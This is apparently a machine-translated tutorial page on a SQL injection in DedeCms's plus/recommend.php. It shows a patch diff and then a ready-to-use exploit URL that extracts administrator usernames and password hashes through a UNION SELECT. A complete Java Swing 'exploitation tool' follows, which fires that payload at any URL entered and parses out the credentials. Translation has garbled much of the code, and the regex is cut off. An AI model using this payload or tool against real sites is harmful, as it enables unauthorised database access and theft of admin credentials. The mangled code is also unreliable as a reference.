Example of using recommend. php injection in DedeCms

Compared with the next patch file

The code is as follows:

Copy code

// Compare the files 3.php and 4.PHP // *** Fix. php     } // $ _ Key = $ _ FILES [$ _ key] ['tmp _ name'] = str_replace ("\\\\","\\", $ _ FILES [$ _ key] ['tmp _ name']); $ _ Key = $ _ FILES [$ _ key] ['tmp _ name'] = $ _ FILES [$ _ key] ['tmp _ name']; $ {$ _ Key. '_ name'} = $ _ FILES [$ _ key] ['name']; // *** Pre-fix. PHP     } $ _ Key = $ _ FILES [$ _ key] ['tmp _ name'] = str_replace ("\\\\","\\", $ _ FILES [$ _ key] ['tmp _ name']); // Replace \ in $ _ FILES [$ _ key] ['tmp _ name'] \\ $ {$ _ Key. '_ name'} = $ _ FILES [$ _ key] ['name']; /***** The following is the obscenity time   ? _ FILES [aid] [name] = 0 & _ FILES [aid] [type] = 1 & _ FILES [aid] [size] = 1 & _ FILES [aid] [tmp_name] = abc \' It is unclear whether the value of $ aid is abc \ '.   ********/

Only provide exp:

The code is as follows:	Copy code
/Plus/recommend. php? Action = & aid = 1 & _ FILES [type] [tmp_name] =\\ % 27% 20or % 20mid = @ '\ % 27' % 20 /*! 50000union *//*! 50000select */, 3, (select % 20 CONCAT (0x7c, userid, 0x7c, pwd) + from + '% 23 @__ admin' % 20 limit +), 5, 6, 9%, 4294 23 @ '\ % 27'{&_files=type={name=*1.jpg & _ FILES [type] [type] = application/octet-stream & _ FILES [type] [size] =

Jsp code

The code is as follows:

Copy code

Package org. javaweb. dede. ui;   Import java. awt. Toolkit; Import java. io. BufferedReader; Import java. io. InputStreamReader; Import java.net. URL; Import java. util. regex. Matcher; Import java. util. regex. Pattern;   /**  * * @ Author yz */ Public class MainFrame extends javax. swing. JFrame {   Private static final long serialVersionUID = 1L;   /** * Creates new form MainFrame */ Public MainFrame (){ InitComponents ();     }   Public String request (String url ){ String str = "", tmp; Try { BufferedReader br = new BufferedReader (new InputStreamReader (new URL (url). openStream ())); While (tmp = br. readLine ())! = Null ){ Str + = tmp + "\ r \ n ";             } } Catch (Exception e ){ JTextArea1.setText (e. toString ());         } Return str;     }   Private void initComponents (){   JPanel1 = new javax. swing. JPanel (); JLabel1 = new javax. swing. JLabel (); JTextField1 = new javax. swing. JTextField (); JButton1 = new javax. swing. JButton (); JScrollPane1 = new javax. swing. JScrollPane (); JTextArea1 = new javax. swing. JTextArea ();   Setdefaclocloseoperation (javax. swing. WindowConstants. EXIT_ON_CLOSE );   JLabel1.setText ("URL :"); JTextField1.setText ("http: // localhost ");   This. setTitle ("DedeCms recommend. php injection exploitation tool -p2j.cn ");   Int screenWidth = Toolkit. Getdefatooltoolkit (). getScreenSize (). width; Int screenHeight = Toolkit. Getdefatooltoolkit (). getScreenSize (). height; This. setBounds (screenWidth/2-229, screenHeight/2-158,458,316 );   JButton1.setText ("get "); JButton1.addActionListener (new java. awt. event. ActionListener (){ Public void actionreceivmed (java. awt. event. ActionEvent evt ){ Jbutton1actionreceivmed (evt );             } });   JTextArea1.setColumns (20 ); JTextArea1.setRows (5 ); JScrollPane1.setViewportView (jTextArea1 );   Javax. swing. GroupLayout jPanel1Layout = new javax. swing. GroupLayout (jPanel1 ); JPanel1.setLayout (jPanel1Layout ); JPanel1Layout. setHorizontalGroup ( JPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING) . AddGroup (jPanel1Layout. createSequentialGroup () . AddGroup (jPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. TRAILING, false) . AddComponent (jScrollPane1, javax. swing. GroupLayout. Alignment. LEADING) . AddGroup (javax. swing. GroupLayout. Alignment. LEADING, jPanel1Layout. createSequentialGroup () . AddContainerGap () . AddComponent (jLabel1) . AddPreferredGap (javax. swing. LayoutStyle. ComponentPlacement. RELATED) . AddComponent (jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE, 331, javax. swing. GroupLayout. PREFERRED_SIZE) . AddPreferredGap (javax. swing. LayoutStyle. ComponentPlacement. RELATED) . AddComponent (jButton1, javax. swing. GroupLayout. PREFERRED_SIZE, 83, javax. swing. GroupLayout. PREFERRED_SIZE ))) . AddGap (0, 0, Short. MAX_VALUE )) ); JPanel1Layout. setVerticalGroup ( JPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING) . AddGroup (jPanel1Layout. createSequentialGroup () . AddContainerGap () . AddGroup (jPanel1Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. BASELINE) . AddComponent (jLabel1) . AddComponent (jTextField1, javax. swing. GroupLayout. PREFERRED_SIZE, javax. swing. GroupLayout. DEFAULT_SIZE, javax. swing. GroupLayout. PREFERRED_SIZE) . AddComponent (jButton1 )) . AddPreferredGap (javax. swing. LayoutStyle. ComponentPlacement. RELATED) . AddComponent (jScrollPane1, javax. swing. GroupLayout. DEFAULT_SIZE, 254, Short. MAX_VALUE )) );   Javax. swing. GroupLayout layout = new javax. swing. GroupLayout (getContentPane ()); GetContentPane (). setLayout (layout ); Layout. setHorizontalGroup ( Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING) . AddComponent (jPanel1, javax. swing. GroupLayout. DEFAULT_SIZE, javax. swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE) ); Layout. setVerticalGroup ( Layout. createParallelGroup (javax. swing. GroupLayout. Alignment. LEADING) . AddComponent (jPanel1, javax. swing. GroupLayout. DEFAULT_SIZE, javax. swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE) ); // Www.111cn.net   Pack (); } // </Editor-fold>   Private void jbutton1actionreceivmed (java. awt. event. ActionEvent evt ){ String url = jTextField1.getText (); If (null = url | "". equals (url )){ Return;         } String result = request (url + "/plus/recommend. php? Action = & aid = 1 & _ FILES [type] [tmp_name] =\\ % 27% 20or % 20mid = @ '\ % 27' % 20 /*! 50000union *//*! 50000select */, 3, (select % 20 CONCAT (0x7c, userid, 0x7c, pwd) + from + '% 23 @__ admin' % 20 limit +), 5, 6, 9%, 4294 23 @ '\ % 27'{&_files=type={name=*1.jpg & _ FILES [type] [type] = application/octet-stream & _ FILES [type] [size] = "); Matcher m = Pattern. compile ("If (m. find ()){ String [] s = m. group (1). split ("\\| "); If (s. length> 2 ){ JTextArea1.setText ("UserName:" + s [1] + "\ r \ nMD5:" + s [2]. substring (3, s [2]. length ()-1 ));             }         }     }                                           Public static void main (String args []) { Java. awt. EventQueue. invokeLater (new Runnable (){ Public void run (){ New MainFrame (). setVisible (true );             } });     }   // Variables declaration-do not modify Private javax. swing. JButton jButton1; Private javax. swing. JLabel jLabel1; Private javax. swing. JPanel jPanel1; Private javax. swing. JScrollPane jScrollPane1; Private javax. swing. JTextArea jTextArea1; Private javax. swing. JTextField jTextField1; // End of variables declaration }

Java standard environment variable configuration:

The code is as follows:	Copy code
JAVA_HOME Address: C: \ Program Files \ Java \ jdk1.7.0 _ 51 CLASS_PATH address: % JAVA_HOME % \ lib Add; % JAVA_HOME % \ bin at the end of path